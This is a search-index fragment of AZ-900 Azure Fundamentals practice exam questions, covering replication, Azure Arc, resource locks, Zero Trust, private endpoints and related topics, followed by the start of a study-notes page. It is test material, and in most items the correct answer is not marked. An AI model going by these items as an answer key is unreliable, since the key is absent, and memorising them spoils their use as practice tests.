                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-____-asynchronously-replicates-the-same-applications-and-data-across-other-azure-regions-for-disaster-recovery-protection","title":"Question 36:\u00a0____ asynchronously replicates the same applications and data across other Azure regions for disaster recovery protection.","text":"
                            • Cross-region replication
                            • Auto-Region Replication
                            • Auto-Region Replicas
                            • Across-Region Replication

                            Cross-region replication is one of several important pillars in the Azure business continuity and disaster recovery strategy. Cross-region replication builds on the synchronous replication of your applications and data that exists by using availability zones within your primary Azure region for high availability. Cross-region replication asynchronously replicates the same applications and data across other Azure regions for disaster recovery protection. Some Azure services take advantage of cross-region replication to ensure business continuity and protect against data loss. Azure provides several\u00a0storage solutions\u00a0that make use of cross-region replication to ensure data availability. For example,\u00a0Azure geo-redundant storage\u00a0(GRS) replicates data to a secondary region automatically. This approach ensures that data is durable even if the primary region isn't recoverable.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-you-want-to-ensure-that-all-virtual-machines-deployed-in-your-azure-environment-are-configured-with-specific-antivirus-software-which-azure-service-can-you-use-to-enforce-this-policy","title":"Question 37:\u00a0You want to ensure that all virtual machines deployed in your Azure environment are configured with specific antivirus software. Which Azure service can you use to enforce this policy?","text":"
                            • Azure Security Center
                            • Azure Policy
                            • Azure Monitor
                            • Azure Advisor
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-which-of-the-following-is-not-a-benefit-of-using-azure-arc","title":"Question 38:\u00a0Which of the following is NOT a benefit of using Azure Arc?","text":"
                            • Centralized billing and cost management for all resources
                            • Improved security and compliance for resources
                            • Increased visibility and control over resources
                            • Consistent management of resources across hybrid environments

                            Azure Arc\u00a0is a hybrid management service that allows you to manage your servers, Kubernetes clusters, and applications across on-premises, multi-cloud, and edge environments. Some of the benefits of using Azure Arc include consistent management of resources across hybrid environments, improved security and compliance for resources, and increased visibility and control over resources. Centralized billing and cost management for all resources:\u00a0Thus is not a benefit of using Azure Arc. While Azure provides centralized billing and cost management for resources in the cloud, Azure Arc is focused on managing resources across hybrid environments and does not provide billing or cost management features.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-yes-or-no-in-a-public-cloud-model-you-get-dedicated-hardware-storage-and-network-devices-than-the-other-organizations-or-cloud-tenants","title":"Question 39:\u00a0Yes or No: In a Public Cloud model, you get dedicated hardware, storage, and network devices than the other organizations or cloud \u201ctenants\".","text":"
                            • Yes
                            • No
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-azure-pay-as-you-go-is-an-example-of-which-cloud-expenditure-model","title":"Question 40:\u00a0Azure Pay As you Go is an example of which cloud expenditure model?","text":"
                            • Operational (OpEx)
                            • Capital (CapEx)
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-which-of-the-following-endpoints-for-a-managed-instance-enables-data-access-to-your-managed-instance-from-outside-a-virtual-network","title":"Question 41:\u00a0Which of the following endpoints for a managed instance enables data access to your managed instance from outside a virtual network?","text":"
                            • Hybrid
                            • External
                            • Private
                            • Public

                            Public endpoint for a\u00a0managed instance\u00a0enables data access to your managed instance from outside the\u00a0virtual network. You are able to access your managed instance from multi-tenant Azure services like Power BI, Azure App Service, or an on-premises network. By using the public endpoint on a managed instance, you do not need to use a VPN, which can help avoid VPN throughput issues.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-which-of-the-following-services-can-help-applications-absorb-unexpected-traffic-bursts-which-prevents-servers-from-being-overwhelmed-by-a-sudden-flood-of-requests","title":"Question 42:\u00a0Which of the following services can help applications absorb unexpected traffic bursts, which prevents servers from being overwhelmed by a sudden flood of requests?","text":"
                            • Azure Decouple Storage
                            • Azure Table Storage
                            • Azure Queue Storage
                            • Azure Message Storage

                            Azure Queue Storage\u00a0is a service for storing large numbers of messages. You access messages from anywhere in the world via authenticated calls using HTTP or HTTPS. A queue message can be up to 64 KB in size. A queue may contain millions of messages, up to the total capacity limit of a storage account. Queues are commonly used to create a backlog of work to process asynchronously.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-in-which-scenario-would-you-use-the-business-to-business-b2b-collaboration-feature-in-azure-ad","title":"Question 43:\u00a0In which scenario would you use the Business-to-Business (B2B) collaboration feature in Azure AD?","text":"
                            • Providing internal access to company reports.
                            • Granting external vendors access to a shared project workspaces
                            • Enabling employees to access internal applications.
                            • Allowing customers to sign up for your e-commerce website.

                            Business-to-Business (B2B) collaboration in Azure AD is used to collaborate with users external to your organization, such as vendors or partners. It allows you to securely share resources like documents and applications while maintaining control over access.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-which-of-the-following-best-describes-azure-arc","title":"Question 44:\u00a0Which of the following best describes Azure Arc?","text":"
                            • A platform for building microservices-based applications that run across multiple nodes
                            • A bridge that extends the Azure platform to help you build apps with the flexibility to run across datacenters
                            • A service for analyzing and visualizing large datasets in the cloud
                            • A cloud-based identity and access management service

                            Azure Arc\u00a0is a service from Microsoft that allows organizations to manage and govern their on-premises servers, Kubernetes clusters, and applications using Azure management tools and services. With Azure Arc, customers can use Azure services such as Azure Policy, Azure Security Center, and Azure Monitor to manage their resources across on-premises, multi-cloud, and edge environments. Azure Arc also enables customers to deploy and manage Azure services on-premises or on other clouds using the same tools and APIs as they use in Azure.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-__-is-a-security-framework-that-uses-the-principles-of-explicit-verification-least-privileged-access-and-assuming-breach-to-keep-users-and-data-secure-while-allowing-for-common-scenarios-like-access-to-applications-from-outside-the-network-perimeter","title":"Question 45:\u00a0__ is a security framework that uses the principles of explicit verification, least privileged access, and assuming breach to keep users and data secure while allowing for common scenarios like access to applications from outside the network perimeter.","text":"
                            • Least Trust
                            • No Trust
                            • Zero Trust
                            • Less Trust
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-yes-or-no-it-is-possible-to-have-multiple-subscriptions-inside-a-management-group","title":"Question 46:\u00a0Yes or No: It is possible to have multiple Subscriptions inside a Management Group.","text":"
                            • Yes
                            • No
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-a-_______-endpoint-is-a-network-interface-that-uses-a-private-ip-address-from-your-virtual-network","title":"Question 47: A _______ endpoint is a network interface that uses a private IP address from your virtual network.","text":"
                            • Public
                            • Internal
                            • Private
                            • Hybrid

                            A private endpoint\u00a0is a network interface that uses a private IP address from your virtual network. This network interface connects you privately and securely to a service that's powered by Azure Private Link. By enabling a private endpoint, you're bringing the service into your virtual network.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-you-are-the-lead-architect-of-your-organization-one-of-the-teams-has-a-requirement-to-copy-hundreds-of-tbs-of-data-to-azure-storage-in-a-secure-and-efficient-manner-the-data-can-be-ingested-one-time-or-an-ongoing-basis-for-archival-scenarios-which-of-the-following-would-be-a-good-solution-for-this-use-case","title":"Question 48:\u00a0You are the lead architect of your organization. One of the teams has a requirement to copy hundreds of TBs of data to Azure storage in a secure and efficient manner. The data can be ingested one time or an ongoing basis for archival scenarios. Which of the following would be a good solution for this use case?","text":"
                            • Azure Data Lake Storage
                            • Azure Cosmos DB
                            • Azure File Sync
                            • Azure Data Box
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-of-the-following-two-storage-solutions-are-built-to-handle-nosql-data","title":"Question 49:\u00a0Which of the following two storage solutions are built to handle NoSQL data?","text":"
                            • Azure SQL\u00a0Database
                            • Azure Table Storage
                            • Azure NoSQL\u00a0Database
                            • Azure Cosmos DB

                            Azure Table storage\u00a0is a service that stores non-relational structured data (also known as structured NoSQL data) in the cloud, providing a key/attribute store with a schemaless design. Because Table storage is schemaless, it's easy to adapt your data as the needs of your application evolve. Azure Cosmos DB\u00a0is a fully managed NoSQL database for modern app development. Single-digit millisecond response times, and automatic and instant scalability, guarantee speed at any scale.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-which-of-the-following-services-can-host-the-following-type-of-apps-web-apps-api-apps-webjobs-mobile-apps","title":"Question 50:\u00a0Which of the following services can host the following type of apps: Web apps, API apps, WebJobs, Mobile apps","text":"
                            • Azure App Service
                            • Azure App Environment
                            • Azure Bastion
                            • Azure Arc
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-51-yes-or-no-subscriptions-can-be-moved-to-another-management-group-as-well-as-merged-into-one-single-subscription","title":"Question 51:\u00a0Yes or No: Subscriptions can be moved to another Management Group as well as merged into one Single subscription.","text":"
                            • No
                            • Yes

                            Even though Subscriptions can be moved to another management group, they cannot be merged into 1 single subscription.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-52-______-lets-you-extend-your-on-premises-networks-into-the-microsoft-cloud-over-a-private-connection-with-the-help-of-a-connectivity-provider","title":"Question 52:\u00a0______ lets you extend your on-premises networks into the Microsoft cloud over a private connection with the help of a connectivity provider.","text":"
                            • Azure DNS
                            • Azure Sentinel
                            • Azure ExpressRoute
                            • Azure Virtual Network
                            • Azure Firewall
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-53-azure-cosmosdb-is-an-example-of-a-_______-offering","title":"Question 53:\u00a0Azure CosmosDB\u00a0is an example of a _______ offering.","text":"
                            • Software as a Service (SaaS)
                            • Platform as a Service (PaaS)
                            • Infrastructure as a Service (IaaS)
                            • Serverless Computing
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-54-yes-or-no-azure-cosmos-db-is-a-software-as-a-service-saas-offering-from-microsoft-azure","title":"Question 54:\u00a0Yes or No: Azure Cosmos DB is a\u00a0Software as a Service (SaaS)\u00a0offering from Microsoft Azure.","text":"
                            • No, it is a PaaS\u00a0offering.
                            • No, it is an IaaS\u00a0offering.
                            • Yes, it is a SaaS\u00a0offering.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-55-which-of-the-following-is-the-foundation-for-building-enterprise-data-lakes-on-azure-and-is-built-on-top-of-azure-blob-storage","title":"Question 55: Which of the following is the foundation for building enterprise data lakes on Azure AND\u00a0is built on top of Azure Blob storage?","text":"
                            • Azure Data Lake Storage Gen4
                            • Azure Data Lake Storage Gen3
                            • Azure Data Lake Storage Gen1
                            • Azure Data Lake Storage Gen2

                            Azure Data Lake Storage Gen2 is a set of capabilities dedicated to big data analytics, built on\u00a0Azure Blob Storage. Data Lake Storage Gen2 converges the capabilities of\u00a0Azure Data Lake Storage Gen1\u00a0with Azure Blob Storage. For example, Data Lake Storage Gen2 provides file system semantics, file-level security, and scale. Because these capabilities are built on Blob storage, you'll also get low-cost, tiered storage, with high availability/disaster recovery capabilities. Reference: https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-introduction

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-56-someone-in-your-organization-accidentally-deleted-an-important-virtual-machine-that-has-led-to-huge-revenue-losses-your-senior-management-has-tasked-you-with-investigating-who-was-responsible-for-the-deletion-which-azure-service-can-you-leverage-for-this-task","title":"Question 56:\u00a0Someone in your organization accidentally deleted an important Virtual Machine that has led to huge revenue losses. Your senior management has tasked you with investigating who was responsible for the deletion. Which Azure service can you leverage for this task?","text":"
                            • Azure Service Health
                            • Azure Arc
                            • Azure Monitor
                            • Azure Advisor
                            • Azure Event Hubs

                            Log Analytics\u00a0is a tool in the Azure portal that's used to edit and run log queries with data in\u00a0**Azure Monitor **\u00a0Logs. You might write a simple query that returns a set of records and then use features of Log Analytics to sort, filter, and analyze them. Or you might write a more advanced query to perform statistical analysis and visualize the results in a chart to identify a particular trend. Whether you work with the results of your queries interactively or use them with other Azure Monitor features, such as log query alerts or workbooks, Log Analytics is the tool that you'll use to write and test them.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-57-true-or-false-azure-dns-can-manage-dns-records-for-your-azure-services-but-cannot-provide-dns-for-your-external-resources","title":"Question 57:\u00a0True or False: Azure DNS can manage DNS records for your Azure services, but cannot provide DNS for your external resources.","text":"
                            • False
                            • True

                            Azure DNS can manage DNS records for your Azure services\u00a0and provide DNS for your external resources as well.\u00a0Azure DNS is integrated in the Azure portal and uses the same credentials, support contract, and billing as your other Azure services. DNS billing is based on the number of DNS zones hosted in Azure and on the number of DNS queries received. To learn more about pricing, see\u00a0Azure DNS pricing.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-58-_______-is-a-strategy-that-employs-a-series-of-mechanisms-to-slow-the-advance-of-an-attack-thats-aimed-at-acquiring-unauthorized-access-to-information-each-layer-provides-protection-so-that-if-one-layer-is-breached-a-subsequent-layer-is-already-in-place-to-prevent-further-exposure","title":"Question 58:\u00a0_______\u00a0is a strategy that employs a series of mechanisms to slow the advance of an attack that's aimed at acquiring unauthorized access to information. Each layer provides protection so that if one layer is breached, a subsequent layer is already in place to prevent further exposure.","text":"
                            • Defense in Depth
                            • Defense in Steps
                            • Defense in Layers
                            • Defense in Series
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-59-which-of-the-following-is-not-a-feature-of-azure-monitor","title":"Question 59:\u00a0Which of the following is NOT a feature of Azure Monitor?","text":"
                            • Log Analytics
                            • Database management
                            • Metrics
                            • Alerts
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-60-true-or-false-when-you-cancel-an-azure-subscription-a-resource-lock-can-block-the-subscription-cancellation","title":"Question 60:\u00a0True or False: When you cancel an Azure subscription, a Resource Lock can block the subscription cancellation.","text":"
                            • True
                            • False

                            When you cancel an Azure subscription:

                            • A resource lock doesn't block the subscription cancellation.
                            • Azure preserves your resources by deactivating them instead of immediately deleting them.
                            • Azure only deletes your resources permanently after a waiting period.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-61-yes-or-no-each-virtual-network-can-have-only-one-vpn-gateway","title":"Question 61:\u00a0Yes or No: Each virtual network can have only one VPN gateway.","text":"
                            • No
                            • Yes

                            VPN Gateway\u00a0sends encrypted traffic between an Azure virtual network and an on-premises location over the public Internet. You can also use VPN Gateway to send encrypted traffic between Azure virtual networks over the Microsoft network. A VPN gateway is a specific type of virtual network gateway. Each virtual network can have only one VPN gateway. However, you can create multiple connections to the same VPN gateway. When you create multiple connections to the same VPN gateway, all VPN tunnels share the available gateway bandwidth.

                            When you configure a virtual network gateway, you configure a setting that specifies the gateway type. The gateway type determines how the virtual network gateway will be used and the actions that the gateway takes. The gateway type 'Vpn' specifies that the type of virtual network gateway created is a 'VPN gateway'. This distinguishes it from an ExpressRoute gateway, which uses a different gateway type. A virtual network can have two virtual network gateways; one VPN gateway and one ExpressRoute gateway. For more information, see\u00a0Gateway types.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-62-which-of-the-following-is-a-benefit-of-using-azure-cloud-shell-for-managing-azure-resources","title":"Question 62:\u00a0 Which of the following is a benefit of using Azure Cloud Shell for managing Azure resources?","text":"
                            • It eliminates the need to install and configure command-line interfaces on your local machine
                            • It provides faster access to Azure resources
                            • It offers more advanced features than other Azure management tools
                            • It allows for easier integration with third-party tools and services
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-63-__-is-a-domain-specific-language-dsl-that-uses-declarative-syntax-to-deploy-azure-resources","title":"Question 63:\u00a0__ is a domain-specific language (DSL) that uses declarative syntax to deploy Azure resources","text":"
                            • Tricep
                            • Bicep
                            • PHP
                            • HTML
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-64-___-enforcement-is-at-the-center-of-a-zero-trust-architecture","title":"Question 64:\u00a0___ enforcement is at the center of a Zero Trust architecture.","text":"
                            • Network
                            • Devices
                            • Identities
                            • Security policy
                            • Data
                            • Applications

                            Security policy enforcement\u00a0is at the center of a Zero Trust architecture. This includes Multi Factor authentication with conditional access that takes into account user account risk, device status, and other criteria and policies that you set.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-65-how-can-you-apply-a-resource-lock-to-an-azure-resource","title":"Question 65:\u00a0How can you apply a resource lock to an Azure resource?","text":"
                            • By using the Azure API\u00a0for RBAC
                            • By configuring a network security group.
                            • By using the Azure portal or Azure PowerShell
                            • By assigning a custom role to the resource.
                            • By creating a new resource group for the resource.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-66-in-azure-which-of-the-following-services-can-be-accessed-through-private-endpoints","title":"Question 66:\u00a0In Azure, which of the following services can be accessed through private endpoints?","text":"
                            • Azure App Service.
                            • Azure Storage accounts.
                            • Azure SQL Database.
                            • All of the above.
                            • Azure Key Vault.

                            Private endpoints can be used to access various Azure services, including Azure Storage accounts, Azure Key Vault, Azure App Service, and Azure SQL Database. By using private endpoints, you can connect to these services from within your virtual network, ensuring that the traffic remains within the Azure backbone network and doesn't traverse the public internet.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-67-which-of-the-following-scenarios-is-a-suitable-use-case-for-applying-a-resource-lock","title":"Question 67:\u00a0Which of the following scenarios is a suitable use case for applying a resource lock?","text":"
                            • Preventing read access to a development virtual machine.
                            • Automating the deployment of resources using templates.
                            • Ensuring a critical storage account is not accidentally deleted.
                            • Restricting network access to an Azure SQL database.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-68-which-of-the-following-best-describes-the-concept-of-immutable-infrastructure-in-the-context-of-iac","title":"Question 68:\u00a0Which of the following best describes the concept of \"immutable infrastructure\" in the context of IaC?","text":"
                            • Infrastructure that is managed through a graphical user interface.
                            • Infrastructure that cannot be changed once deployed.
                            • Infrastructure that is recreated rather than modified in place.
                            • Infrastructure that is stored in a physical data center.

                            Immutable infrastructure refers to the practice of recreating infrastructure components whenever changes are needed rather than modifying them in place. This approach aligns with IaC principles, enhancing consistency and reducing configuration drift.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-69-an-____-in-azure-monitor-monitors-your-telemetry-and-captures-a-signal-to-see-if-the-signal-meets-the-criteria-of-a-preset-condition-if-the-conditions-are-met-an-alert-is-triggered-which-initiates-the-associated-action-group","title":"Question 69:\u00a0A(n) ____ in Azure Monitor monitors your telemetry and captures a signal to see if the signal meets the criteria of a preset condition. If the conditions are met, an alert is triggered, which initiates the associated action group.","text":"
                            • alert rule
                            • preset rule
                            • preset condition
                            • alert condition

                            An\u00a0alert rule\u00a0monitors your telemetry and captures a signal that indicates that something is happening on a specified target. The alert rule captures the signal and checks to see if the signal meets the criteria of the condition. If the conditions are met, an alert is triggered, which initiates the associated action group and updates the state of the alert.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-70-as-the-owner-of-a-streaming-platform-deployed-on-azure-you-notice-a-huge-spike-in-traffic-whenever-a-new-web-series-in-released-but-moderate-traffic-otherwise-which-of-the-following-is-a-clear-benefit-of-this-type-of-workload","title":"Question 70:\u00a0As the owner of a streaming platform deployed on Azure, you notice a huge spike in traffic whenever a new web-series in released but moderate traffic otherwise. Which of the following is a clear benefit of this type of workload?","text":"
                            • Load balancing
                            • Elasticity
                            • High availability
                            • High latency

                            Elasticity in this case is the ability to provide additional compute resource when needed (spikes) and reduce the compute resource when not needed to reduce costs. Load Balancing and High Availability are also great advantages the streaming platform would enjoy, but Elasticity is the option that best describes the workload in the Question. Autoscaling is an example of elasticity.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-71-which-of-the-following-can-repeatedly-deploy-your-infrastructure-throughout-the-development-lifecycle-and-have-confidence-your-resources-are-deployed-in-a-consistent-manner","title":"Question 71:\u00a0Which of the following can repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner?","text":"
                            • Azure Resource Manager templates
                            • The Azure API Management service
                            • Azure Templates
                            • Management groups

                            Azure Resource Manager Templates is correct since templates are idempotent (Same), which means you can deploy the same template many times and get the same resource types in the same state.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-72-in-the-context-of-infrastructure-as-code-iac-___-are-independent-files-typically-containing-set-of-resources-meant-to-be-deployed-together","title":"Question 72:\u00a0In the context of Infrastructure as Code (IaC), ___\u00a0 are independent files, typically containing set of resources meant to be deployed together.","text":"
                            • Methods
                            • Modules
                            • Units
                            • Functions

                            Modules\u00a0are independent files, typically containing set of resources meant to be deployed together. Modules allow you to break complex templates into smaller, more manageable sets of code. You can ensure that each module focuses on a specific task and that all modules are reusable for multiple deployments and workloads. Reference: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/considerations/infrastructure-as-code

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-73-___-service-is-available-to-transfer-on-premises-data-to-blob-storage-when-large-datasets-or-network-constraints-make-uploading-data-over-the-wire-unrealistic","title":"Question 73:\u00a0___ service is available to transfer on-premises data to Blob storage when large datasets or network constraints make uploading data over the wire unrealistic.","text":"
                            • Azure Blob Storage
                            • Azure FileSync
                            • Azure Data Factory
                            • Azure Data Box
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-74-which-type-of-resource-lock-allows-you-to-modify-the-resource-but-not-delete-it","title":"Question 74:\u00a0Which type of resource lock allows you to modify the resource, but not delete it?","text":"
                            • CanNotModify lock
                            • Restrict lock
                            • CanNotDelete lock
                            • Read-only lock
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-75-your-colleague-is-looking-for-an-azure-service-that-can-help-them-understand-how-their-applications-are-performing-and-proactively-identify-issues-that-affect-them-and-the-resources-they-depend-on-whats-your-recommendation","title":"Question 75:\u00a0Your colleague is looking for an Azure service that can help them understand how their applications are performing and proactively identify issues that affect them , AND the resources they depend on. What's your recommendation?","text":"
                            • Azure Monitor
                            • Azure Service Health
                            • Azure Advisor
                            • Azure Comprehend
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-76-which-cloud-deployment-model-is-best-suited-for-organizations-with-extremely-strict-data-security-and-compliance-requirements","title":"Question 76:\u00a0Which cloud deployment model is best suited for organizations with extremely strict data security and compliance requirements?","text":"
                            • Community cloud
                            • Private cloud
                            • Public cloud
                            • Hybrid cloud
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-77-if-your-organization-has-many-azure-subscriptions-which-of-the-following-is-useful-to-efficiently-manage-access-policies-and-compliance-for-those-subscriptions","title":"Question 77:\u00a0If your organization has many Azure subscriptions, which of the following is useful to efficiently manage access, policies, and compliance for those subscriptions?","text":"
                            • Azure Subscriptions
                            • Azure Policy
                            • Azure Management Groups
                            • Azure Blueprints
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-78-__-allows-you-to-implement-your-systems-logic-into-readily-available-blocks-of-code-that-can-run-anytime-you-need-to-respond-to-critical-events","title":"Question 78:\u00a0__ allows you to implement your system's logic into readily available blocks of code that can run anytime you need to respond to critical events.","text":"
                            • Azure Cognitive Services
                            • Azure Application Insights
                            • Azure Functions
                            • Azure Kinect DK
                            • Azure Quantum

                            Azure Functions provides \"compute on-demand\" in\u00a0two\u00a0significant ways. First, Azure Functions allows you to implement your system's logic into readily available blocks of code. These code blocks are called \"functions\". Different functions can run anytime you need to respond to critical events. Second, as requests increase, Azure Functions meets the demand with as many resources and function instances as necessary - but only while needed. As requests fall, any extra resources and application instances drop off automatically.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-79-you-have-managed-a-web-app-that-you-developed-and-deployed-on-prem-for-a-long-time-but-would-now-like-to-move-it-to-azure-and-relieved-of-all-the-manual-administration-and-maintenance-which-of-the-following-buckets-would-be-most-suitable-for-your-use-case","title":"Question 79:\u00a0You have managed a Web App that you developed and deployed On-Prem for a long time, but would now like to move it to Azure and relieved of all the manual administration and maintenance. Which of the following buckets would be most suitable for your use case?","text":"
                            • Platform as a Service (PaaS)
                            • Software as a Service (SaaS)
                            • Infrastructure as a Service (IaaS)
                            • Database as a Service (DaaS)
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-80-microsofts-approach-to-privacy-is-built-on-six-principles-which-of-the-following-is-not-one-of-those-6-principles","title":"Question 80:\u00a0Microsoft's approach to privacy is built on six principles. Which of the following is NOT\u00a0one of those 6 principles?","text":"
                            • Transparency
                            • Security
                            • Strong legal protections
                            • Protection
                            • Control
                            • No content-based targeting

                            Microsoft's approach to privacy is built on six principles:

                            1. Control: Microsoft provides customers with the ability to control their personal data and how it is used.
                            2. Transparency: Microsoft is transparent about the collection, use, and sharing of personal data.
                            3. Security: Microsoft takes strong measures to protect personal data from unauthorized access, disclosure, alteration, and destruction.
                            4. Strong legal protections: Microsoft complies with applicable laws and regulations, including data protection and privacy laws.
                            5. No content-based targeting:\u00a0Microsoft does not use personal data to target advertising to customers based on the content of their communications or files.
                            6. Benefits to the customer:\u00a0Microsoft uses personal data to provide customers with valuable products and services that improve their productivity and overall experience.

                            Protection is NOT\u00a0one of the principles.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-81-in-the-context-of-azure-networking-what-is-the-purpose-of-a-network-security-group-nsg-associated-with-a-private-endpoint","title":"Question 81:\u00a0In the context of Azure networking, what is the purpose of a Network Security Group (NSG) associated with a private endpoint?","text":"
                            • To manage IP address assignments for the private endpoint.
                            • To encrypt data traffic between the private endpoint and the Azure service.
                            • To ensure the availability and uptime of the private endpoint.
                            • To enforce access control rules on inbound and outbound traffic to the private endpoint.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-82-true-or-false-each-zone-is-made-up-of-one-or-more-datacenters-equipped-with-common-power-cooling-and-networking","title":"Question 82:\u00a0True or False: Each zone is made up of one or more datacenters equipped with common power, cooling, and networking.","text":"
                            • False
                            • True

                            Azure Availability Zones are unique physical locations within an Azure region and offer high availability to protect your applications and data from datacenter failures. Each zone is made up of one or more datacenters equipped with\u00a0independent\u00a0power, cooling, and networking.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-83-what-is-the-maximum-number-of-cloud-only-user-accounts-that-can-be-created-in-azure-ad","title":"Question 83:\u00a0What is the maximum number of cloud-only user accounts that can be created in Azure AD?","text":"
                            • 100,000
                            • 500,000
                            • 50,000
                            • 1,000,000

                            The correct answer is\u00a0 1,000,000. Azure AD has the capability to hold up to\u00a01,000,000 cloud-only user accounts. This limit can be extended further by contacting Microsoft support.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-84-your-organization-uses-microsoft-defender-for-cloud-and-you-receive-an-alert-that-suspicious-activity-has-been-detected-on-one-of-your-cloud-resources-what-should-you-do","title":"Question 84:\u00a0Your organization uses Microsoft Defender for Cloud and you receive an alert that suspicious activity has been detected on one of your cloud resources. What should you do?","text":"
                            • Delete the cloud resource to prevent the threat from spreading.
                            • Investigate the alert and take appropriate action to remediate the threat if necessary.

                            • Wait for a follow-up email from Microsoft Support before taking any action.

                            • Ignore the alert, as Microsoft Defender for Cloud will automatically handle any threats.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-85-which-of-the-following-resources-can-be-managed-using-azure-arc","title":"Question 85:\u00a0Which of the following resources can be managed using Azure Arc?","text":"
                            • Only Kubernetes Clusters and Virtual\u00a0Machines
                            • All of these
                            • Kubernetes clusters
                            • Only Windows and Linux Servers &\u00a0Virtual Machines
                            • Virtual machines
                            • Windows Server and Linux servers

                            The answer is All of the these. Azure Arc enables you to manage resources both on-premises and across multiple clouds using a single control plane. This includes managing Windows Server and Linux servers, Kubernetes clusters, and virtual machines. By extending Azure services to hybrid environments, Azure Arc provides consistent management, security, and compliance across all resources.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-preparation/","title":"AZ-900: Notes to get through the Azure Fundamentals Certificate","text":"

                            The following notes are derived from the Microsoft e-learning platform. They may not be entirely original, as I've included some paragraphs directly from the Microsoft e-learning platform and some other sources. However, what makes this repository particularly valuable is my effort to enrich and curate the content, along with the addition of valuable tips that can assist anyone in passing the exam.

                            • Notes taken in: September 2023.
                            • Certification accomplish at: 23th September 2023.
                            • Practice tests: Practice tests from different sources.

                            Sources of this notes:

                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - Azure Fundamentals. Study guide\", by Jim Boyce.
